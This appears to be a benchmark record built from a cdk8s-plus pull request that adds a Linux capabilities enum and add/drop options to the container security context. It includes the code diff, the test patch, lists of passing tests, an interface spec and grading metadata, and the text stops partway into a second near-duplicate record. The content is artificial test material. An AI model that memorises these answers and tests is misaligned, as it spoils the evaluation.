], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
a4f6d8e8faadf14d0b453761a1944464456854d7
2024-04-18 07:32:24
cdk8s-team__cdk8s-plus-4048
diff --git a/src/container.ts b/src/container.ts index e5940b92..2fcca1e5 100644 --- a/src/container.ts +++ b/src/container.ts @@ -7,6 +7,188 @@ import * as secret from './secret'; import { undefinedIfEmpty } from './utils'; import * as volume from './volume'; +/** + * Capability - complete list of POSIX capabilities + */ +export enum Capability { + /** + * CAP_AUDIT_CONTROL + */ + AUDIT_CONTROL = 'CAP_AUDIT_CONTROL', + /** + * CAP_AUDIT_READ + */ + AUDIT_READ = 'CAP_AUDIT_READ', + /** + * CAP_AUDIT_WRITE + */ + AUDIT_WRITE = 'CAP_AUDIT_WRITE', + /** + * CAP_BLOCK_SUSPEND + */ + BLOCK_SUSPEND = 'CAP_BLOCK_SUSPEND', + /** + * CAP_BPF + */ + BPF = 'CAP_BPF', + /** + * CAP_CHECKPOINT_RESTORE + */ + CHECKPOINT_RESTORE = 'CAP_CHECKPOINT_RESTORE', + /** + * CAP_CHOWN + */ + CHOWN = 'CAP_CHOWN', + /** + * CAP_DAC_OVERRIDE + */ + DAC_OVERRIDE = 'CAP_DAC_OVERRIDE', + /** + * CAP_DAC_READ_SEARCH + */ + DAC_READ_SEARCH = 'CAP_DAC_READ_SEARCH', + /** + * CAP_FOWNER + */ + FOWNER = 'CAP_FOWNER', + /** + * CAP_FSETID + */ + FSETID = 'CAP_FSETID', + /** + * CAP_IPC_LOCK + */ + IPC_LOCK = 'CAP_IPC_LOCK', + /** + * CAP_IPC_OWNER + */ + IPC_OWNER = 'CAP_IPC_OWNER', + /** + * CAP_KILL + */ + KILL = 'CAP_KILL', + /** + * CAP_LEASE + */ + LEASE = 'CAP_LEASE', + /** + * CAP_LINUX_IMMUTABLE + */ + LINUX_IMMUTABLE = 'CAP_LINUX_IMMUTABLE', + /** + * CAP_MAC_ADMIN + */ + MAC_ADMIN = 'CAP_MAC_ADMIN', + /** + * CAP_MAC_OVERRIDE + */ + MAC_OVERRIDE = 'CAP_MAC_OVERRIDE', + /** + * CAP_MKNOD + */ + MKNOD = 'CAP_MKNOD', + /** + * CAP_NET_ADMIN + */ + NET_ADMIN = 'CAP_NET_ADMIN', + /** + * CAP_NET_BIND_SERVICE + */ + NET_BIND_SERVICE = 'CAP_NET_BIND_SERVICE', + /** + * CAP_NET_BROADCAST + */ + NET_BROADCAST = 'CAP_NET_BROADCAST', + /** + * CAP_NET_RAW + */ + NET_RAW = 'CAP_NET_RAW', + /** + * CAP_PERFMON + */ + PERFMON = 'CAP_PERFMON', + /** + * CAP_SETGID + */ + SETGID = 'CAP_SETGID', + /** + * CAP_SETFCAP + */ + SETFCAP = 'CAP_SETFCAP', + /** + * CAP_SETPCAP + */ + SETPCAP = 'CAP_SETPCAP', + /** 
+ * CAP_SETUID + */ + SETUID = 'CAP_SETUID', + /** + * CAP_SYS_ADMIN + */ + SYS_ADMIN = 'CAP_SYS_ADMIN', + /** + * CAP_SYS_BOOT + */ + SYS_BOOT = 'CAP_SYS_BOOT', + /** + * CAP_SYS_CHROOT + */ + SYS_CHROOT = 'CAP_SYS_CHROOT', + /** + * CAP_SYS_MODULE + */ + SYS_MODULE = 'CAP_SYS_MODULE', + /** + * CAP_SYS_NICE + */ + SYS_NICE = 'CAP_SYS_NICE', + /** + * CAP_SYS_PACCT + */ + SYS_PACCT = 'CAP_SYS_PACCT', + /** + * CAP_SYS_PTRACE + */ + SYS_PTRACE = 'CAP_SYS_PTRACE', + /** + * CAP_SYS_RAWIO + */ + SYS_RAWIO = 'CAP_SYS_RAWIO', + /** + * CAP_SYS_RESOURCE + */ + SYS_RESOURCE = 'CAP_SYS_RESOURCE', + /** + * CAP_SYS_TIME + */ + SYS_TIME = 'CAP_SYS_TIME', + /** + * CAP_SYS_TTY_CONFIG + */ + SYS_TTY_CONFIG = 'CAP_SYS_TTY_CONFIG', + /** + * CAP_SYSLOG + */ + SYSLOG = 'CAP_SYSLOG', + /** + * CAP_WAKE_ALARM + */ + WAKE_ALARM = 'CAP_WAKE_ALARM', +} + +export interface ContainerSecutiryContextCapabilities { + /** + * Added capabilities + */ + readonly add?: Capability[]; + + /** + * Removed capabilities + */ + readonly drop?: Capability[]; +} + /** * Properties for `ContainerSecurityContext` */ @@ -59,6 +241,13 @@ export interface ContainerSecurityContextProps { * @default false */ readonly allowPrivilegeEscalation?: boolean; + + /** + * POSIX capabilities for running containers + * + * @default none + */ + readonly capabilities?: ContainerSecutiryContextCapabilities; } /** @@ -137,6 +326,7 @@ export class ContainerSecurityContext { public readonly user?: number; public readonly group?: number; public readonly allowPrivilegeEscalation?: boolean; + public readonly capabilities?: ContainerSecutiryContextCapabilities; constructor(props: ContainerSecurityContextProps = {}) { this.ensureNonRoot = props.ensureNonRoot ?? true; @@ -145,6 +335,7 @@ export class ContainerSecurityContext { this.user = props.user; this.group = props.group; this.allowPrivilegeEscalation = props.allowPrivilegeEscalation ?? 
false; + this.capabilities = props.capabilities; } /** @@ -158,6 +349,7 @@ export class ContainerSecurityContext { privileged: this.privileged, readOnlyRootFilesystem: this.readOnlyRootFilesystem, allowPrivilegeEscalation: this.allowPrivilegeEscalation, + capabilities: this.capabilities, }; } @@ -330,7 +522,7 @@ export class EnvValue { * @param key - The key to extract the value from. * @param options - Additional options. */ - public static fromConfigMap(configMap: configmap.IConfigMap, key: string, options: EnvValueFromConfigMapOptions = { }): EnvValue { + public static fromConfigMap(configMap: configmap.IConfigMap, key: string, options: EnvValueFromConfigMapOptions = {}): EnvValue { const source: k8s.EnvVarSource = { configMapKeyRef: { @@ -432,7 +624,7 @@ export class EnvValue { return EnvValue.fromValue(value!); } - private constructor(public readonly value?: any, public readonly valueFrom?: any) {} + private constructor(public readonly value?: any, public readonly valueFrom?: any) { } } export enum ImagePullPolicy { @@ -846,7 +1038,7 @@ export class Container { * @param path - The desired path in the container. * @param storage - The storage to mount. */ - public mount(path: string, storage: volume.IStorage, options: MountOptions = { }) { + public mount(path: string, storage: volume.IStorage, options: MountOptions = {}) { this.mounts.push({ path, volume: storage.asVolume(), ...options }); } @@ -1131,7 +1323,7 @@ export class EnvFrom { constructor( private readonly configMap?: configmap.IConfigMap, private readonly prefix?: string, - private readonly sec?: secret.ISecret) {}; + private readonly sec?: secret.ISecret) { }; /** * @internal
feat(container): add capabilities to security context (#3817) # Backport This will backport the following commits from `k8s-29/main` to `k8s-28/main`: - [feat(container): add capabilities to security context (#3817)](https://github.com/cdk8s-team/cdk8s-plus/pull/3817) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add POSIX capability configuration to container security context **Problem** Users cannot currently specify Linux capabilities to add or drop when defining a container’s security context, limiting fine‑grained privilege control. **Root Cause** The security context model does not expose any field for capabilities, so the underlying manifest never includes them. **Fix / Expected Behavior** - Introduce a representation of all supported POSIX capabilities. - Provide a structure for declaring capabilities to add and/or drop. - Extend the container security context API to accept this new capabilities configuration. - Ensure the capabilities section is serialized into the generated pod spec when supplied. - Preserve existing behavior when no capabilities are defined. **Risk & Validation** - Verify that adding the new fields does not alter the output of existing manifests (regression test). - Add tests that confirm the correct rendering of `add` and `drop` capabilities in the security context. - Run the full test suite to ensure no breakage in unrelated components.
4,048
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index 4d570d58..bf349bc1 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, ContainerRestartPolicy } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy } from '../src'; describe('EnvValue', () => { @@ -777,6 +777,7 @@ test('default security context', () => { runAsNonRoot: container.securityContext.ensureNonRoot, runAsUser: container.securityContext.user, allowPrivilegeEscalation: container.securityContext.allowPrivilegeEscalation, + capabilities: container.securityContext.capabilities, }); }); @@ -790,6 +791,14 @@ test('custom security context', () => { privileged: true, user: 1000, group: 2000, + capabilities: { + add: [ + Capability.AUDIT_CONTROL, + ], + drop: [ + Capability.BPF, + ], + }, }, }); @@ -798,6 +807,8 @@ test('custom security context', () => { expect(container.securityContext.readOnlyRootFilesystem).toBeTruthy(); expect(container.securityContext.user).toEqual(1000); expect(container.securityContext.group).toEqual(2000); + expect(container.securityContext.capabilities?.add).toEqual(['CAP_AUDIT_CONTROL']); + expect(container.securityContext.capabilities?.drop).toEqual(['CAP_BPF']); });
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests" ]
[ "defaultChild", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "defaults", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default configuration", "custom configuration", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves 
deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config 
secret", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add 
egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "default security context", "custom security context", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update 
strategy", "custom update strategy", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, 
scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key 
for determinstic synthesis", "default medium", "memory medium", "size limit", "fromCommand", "fromHttpGet", "fromTcpSocket", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can 
allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant 
read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Enum: Capability Location: src/container.ts – exported enum `Capability` Inputs: *(none)* Outputs: string values representing POSIX capabilities (e.g., `CAP_AUDIT_CONTROL`, `CAP_BPF`, …) Description: Enumerates all supported POSIX capabilities that can be added to or dropped from a container’s security context. Interface: ContainerSecurityContextCapabilities Location: src/container.ts – exported interface `ContainerSecurityContextCapabilities` Inputs: - `add?: Capability[]` – list of capabilities to **add** to the container. - `drop?: Capability[]` – list of capabilities to **drop** from the container. Outputs: *(none)* Description: Shape of the object supplied to a security context to describe which capabilities should be added or removed. Interface: ContainerSecurityContextProps Location: src/container.ts – exported interface `ContainerSecurityContextProps` Inputs: all existing fields plus the new optional field: - `capabilities?: ContainerSecurityContextCapabilities` – POSIX capabilities configuration. Outputs: *(none)* Description: Configuration object used when constructing a `ContainerSecurityContext`; now supports specifying capability additions and removals. Property: ContainerSecurityContext.capabilities Location: src/container.ts – class `ContainerSecurityContext` (public readonly) Inputs: set via the `capabilities` field of `ContainerSecurityContextProps`. Outputs: `ContainerSecurityContextCapabilities | undefined` Description: Exposes the capabilities configuration on a container’s security context; tests read this property to verify the `add` and `drop` capability lists.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 196, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3817", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to add POSIX capabilities support to a container's security context. The test patch imports a Capability enum, adds a capabilities field to the security context, and asserts the correct values are emitted, which aligns with the intended feature. No signals of test‑suite coupling, implicit naming, external dependencies, ambiguous specs beyond the brief description, patch artifacts, or hidden domain knowledge are present. 
Therefore the task is solvable as described.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
68ea68125ca4d9b880b884d3faed186d6808688f
2024-04-18 16:56:53
cdk8s-team__cdk8s-plus-4055
diff --git a/src/container.ts b/src/container.ts index 28048a6e..79cc6dd4 100644 --- a/src/container.ts +++ b/src/container.ts @@ -7,6 +7,188 @@ import * as secret from './secret'; import { undefinedIfEmpty } from './utils'; import * as volume from './volume'; +/** + * Capability - complete list of POSIX capabilities + */ +export enum Capability { + /** + * CAP_AUDIT_CONTROL + */ + AUDIT_CONTROL = 'CAP_AUDIT_CONTROL', + /** + * CAP_AUDIT_READ + */ + AUDIT_READ = 'CAP_AUDIT_READ', + /** + * CAP_AUDIT_WRITE + */ + AUDIT_WRITE = 'CAP_AUDIT_WRITE', + /** + * CAP_BLOCK_SUSPEND + */ + BLOCK_SUSPEND = 'CAP_BLOCK_SUSPEND', + /** + * CAP_BPF + */ + BPF = 'CAP_BPF', + /** + * CAP_CHECKPOINT_RESTORE + */ + CHECKPOINT_RESTORE = 'CAP_CHECKPOINT_RESTORE', + /** + * CAP_CHOWN + */ + CHOWN = 'CAP_CHOWN', + /** + * CAP_DAC_OVERRIDE + */ + DAC_OVERRIDE = 'CAP_DAC_OVERRIDE', + /** + * CAP_DAC_READ_SEARCH + */ + DAC_READ_SEARCH = 'CAP_DAC_READ_SEARCH', + /** + * CAP_FOWNER + */ + FOWNER = 'CAP_FOWNER', + /** + * CAP_FSETID + */ + FSETID = 'CAP_FSETID', + /** + * CAP_IPC_LOCK + */ + IPC_LOCK = 'CAP_IPC_LOCK', + /** + * CAP_IPC_OWNER + */ + IPC_OWNER = 'CAP_IPC_OWNER', + /** + * CAP_KILL + */ + KILL = 'CAP_KILL', + /** + * CAP_LEASE + */ + LEASE = 'CAP_LEASE', + /** + * CAP_LINUX_IMMUTABLE + */ + LINUX_IMMUTABLE = 'CAP_LINUX_IMMUTABLE', + /** + * CAP_MAC_ADMIN + */ + MAC_ADMIN = 'CAP_MAC_ADMIN', + /** + * CAP_MAC_OVERRIDE + */ + MAC_OVERRIDE = 'CAP_MAC_OVERRIDE', + /** + * CAP_MKNOD + */ + MKNOD = 'CAP_MKNOD', + /** + * CAP_NET_ADMIN + */ + NET_ADMIN = 'CAP_NET_ADMIN', + /** + * CAP_NET_BIND_SERVICE + */ + NET_BIND_SERVICE = 'CAP_NET_BIND_SERVICE', + /** + * CAP_NET_BROADCAST + */ + NET_BROADCAST = 'CAP_NET_BROADCAST', + /** + * CAP_NET_RAW + */ + NET_RAW = 'CAP_NET_RAW', + /** + * CAP_PERFMON + */ + PERFMON = 'CAP_PERFMON', + /** + * CAP_SETGID + */ + SETGID = 'CAP_SETGID', + /** + * CAP_SETFCAP + */ + SETFCAP = 'CAP_SETFCAP', + /** + * CAP_SETPCAP + */ + SETPCAP = 'CAP_SETPCAP', + /** 
+ * CAP_SETUID + */ + SETUID = 'CAP_SETUID', + /** + * CAP_SYS_ADMIN + */ + SYS_ADMIN = 'CAP_SYS_ADMIN', + /** + * CAP_SYS_BOOT + */ + SYS_BOOT = 'CAP_SYS_BOOT', + /** + * CAP_SYS_CHROOT + */ + SYS_CHROOT = 'CAP_SYS_CHROOT', + /** + * CAP_SYS_MODULE + */ + SYS_MODULE = 'CAP_SYS_MODULE', + /** + * CAP_SYS_NICE + */ + SYS_NICE = 'CAP_SYS_NICE', + /** + * CAP_SYS_PACCT + */ + SYS_PACCT = 'CAP_SYS_PACCT', + /** + * CAP_SYS_PTRACE + */ + SYS_PTRACE = 'CAP_SYS_PTRACE', + /** + * CAP_SYS_RAWIO + */ + SYS_RAWIO = 'CAP_SYS_RAWIO', + /** + * CAP_SYS_RESOURCE + */ + SYS_RESOURCE = 'CAP_SYS_RESOURCE', + /** + * CAP_SYS_TIME + */ + SYS_TIME = 'CAP_SYS_TIME', + /** + * CAP_SYS_TTY_CONFIG + */ + SYS_TTY_CONFIG = 'CAP_SYS_TTY_CONFIG', + /** + * CAP_SYSLOG + */ + SYSLOG = 'CAP_SYSLOG', + /** + * CAP_WAKE_ALARM + */ + WAKE_ALARM = 'CAP_WAKE_ALARM', +} + +export interface ContainerSecutiryContextCapabilities { + /** + * Added capabilities + */ + readonly add?: Capability[]; + + /** + * Removed capabilities + */ + readonly drop?: Capability[]; +} + /** * Properties for `ContainerSecurityContext` */ @@ -59,6 +241,13 @@ export interface ContainerSecurityContextProps { * @default false */ readonly allowPrivilegeEscalation?: boolean; + + /** + * POSIX capabilities for running containers + * + * @default none + */ + readonly capabilities?: ContainerSecutiryContextCapabilities; } /** @@ -137,6 +326,7 @@ export class ContainerSecurityContext { public readonly user?: number; public readonly group?: number; public readonly allowPrivilegeEscalation?: boolean; + public readonly capabilities?: ContainerSecutiryContextCapabilities; constructor(props: ContainerSecurityContextProps = {}) { this.ensureNonRoot = props.ensureNonRoot ?? true; @@ -145,6 +335,7 @@ export class ContainerSecurityContext { this.user = props.user; this.group = props.group; this.allowPrivilegeEscalation = props.allowPrivilegeEscalation ?? 
